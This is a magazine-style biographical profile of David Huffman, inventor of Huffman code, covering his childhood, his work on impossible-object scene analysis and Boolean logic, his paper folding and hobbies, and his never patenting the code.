Huffman’s earliest years did not mark him as a prodigy. His mother once told him that he lagged behind other children by two years in learning how to speak. He attributes his slow development to a number of family incidents that led to his parents’ divorce and that he has ever since tried to forget. His mother, whom he recalls with great affection, tried to help by becoming a mathematics teacher at a school for troubled children so he could be enrolled there. But a series of tests immediately made clear to his mother and teachers that his reticence had masked precociousness.

At school, Huffman soon leapfrogged his classmates. He finished a bachelor’s degree in electrical engineering at Ohio State University at the age of 18 and immediately became an officer in the U.S. Navy, where he served on a destroyer that helped to clear mines in Japanese and Chinese waters after World War II.

Huffman believes his tumultuous early years fostered a love of mathematics. “I like things neat,” he says. “I like to wrap things up and get definitive answers, possibly because of the uncertainties of my early life.” A sense of order is something toward which he continues to strive. Huffman told this caller that he could spare only 20 minutes. When the time elapsed, an alarm dutifully sounded in the background.

The imposition of structure where none exists has proved a recurrent theme of his career. In the early 1970s Huffman became a debunker of optical illusions. What inspired him were the seemingly incongruous shapes in the work of M. C. Escher: triangles containing three right angles, for example. Inspecting Escher’s creations, which he much admires, led him to devise a set of rules to determine whether an artist’s picture or a video image had cheated in depicting a two-dimensional representation of a three-dimensional scene.

Huffman determined a method for showing whether the many boundaries between geometric elements in an image—represented as Y, V or T shapes, among others—logically fit into a coherent pattern. He describes his proof as an image grammar. “I wanted to create a sieve so grammatical pictures would go through and ungrammatical images would be seen as unrealizable,” he says. This contribution to the young field of scene analysis, which has been used in developing machine vision systems for robots, was presented in a 1971 paper entitled “Impossible Objects as Nonsense Sentences.”

Huffman’s other work has ranged from the design of radar waveforms to his last paper, published in the early 1980s, which proved that a digital computer could be designed that would virtually eliminate one of the staples of Boolean algebra. Huffman showed that a hypothetical machine could function using only one NOT operation.

This logic element from Boolean algebra takes a zero or a one and converts it to its binary opposite (NOT zero but one). Huffman called a lecture he gave on the subject, “How to Say No Once and Really Mean It.” Says Huffman: “It was totally impractical, but it was a kind of a mind exercise that showed how it could be done. I enjoy pushing things to their theoretical limits.”

Since that time, Huffman has exchanged paper writing for paper folding. He wanted to see how the lines and intersections on the flat surfaces that he had pored over in his work on scene analysis could be folded into three-dimensional structures. Using a stylus to emboss lines into paper or thin vinyl sheets, he has concocted spirals, domes and other shapes. Huffman has lectured on the theory and practice of paper folding at M.I.T. and Stanford, among other institutions.

Paper folding goes along with a number of other whimsical pursuits. Huffman learned how to ride a unicycle from Claude Shannon and still keeps one in his garage. His living room, which is adorned with his contorted paper creations, is also sometimes graced with a large red circus ball and his invention of a Bongo Board that rolls in two axes. On Huffman’s board, a rider stands atop a bowling ball rather than the standard cylindrical roller.

Although others have used Huffman code to help make millions of dollars, Huffman’s main compensation was dispensation from a final exam. He never tried to patent an invention from his work and experiences only a twinge of regret at not having used his creation to make himself rich. “If I had the best of both worlds, I would have had recognition as a scientist, and I would have gotten monetary rewards,” he says. “I guess I got one and not the other.”

If Huffman were just starting his career, patent attorneys would surely be knocking on his door. Patenting of algorithms is still subject to endless judicial debate. But a lawyer today would tell Huffman to “clothe” his code in silicon, that is, produce a patentable microchip that contains his code programmed into memory. “I bet I could write an application that would be considered patentable,” says Richard H. Stern, a patent attorney who was chief of the intellectual property section of the U.S. Department of Justice from 1970 to 1978.

But Huffman has received other compensation. Textbooks on data communications and other digital arts include sections on Huffman code. Huffman has received several awards from the Institute of Electrical and Electronics Engineers. And a few years ago an acquaintance told him that he had noticed that a reference to the code was spelled with a lowercase “H.” Remarked his friend to Huffman, “David, I guess your name has finally entered the language.”

–Gary Stix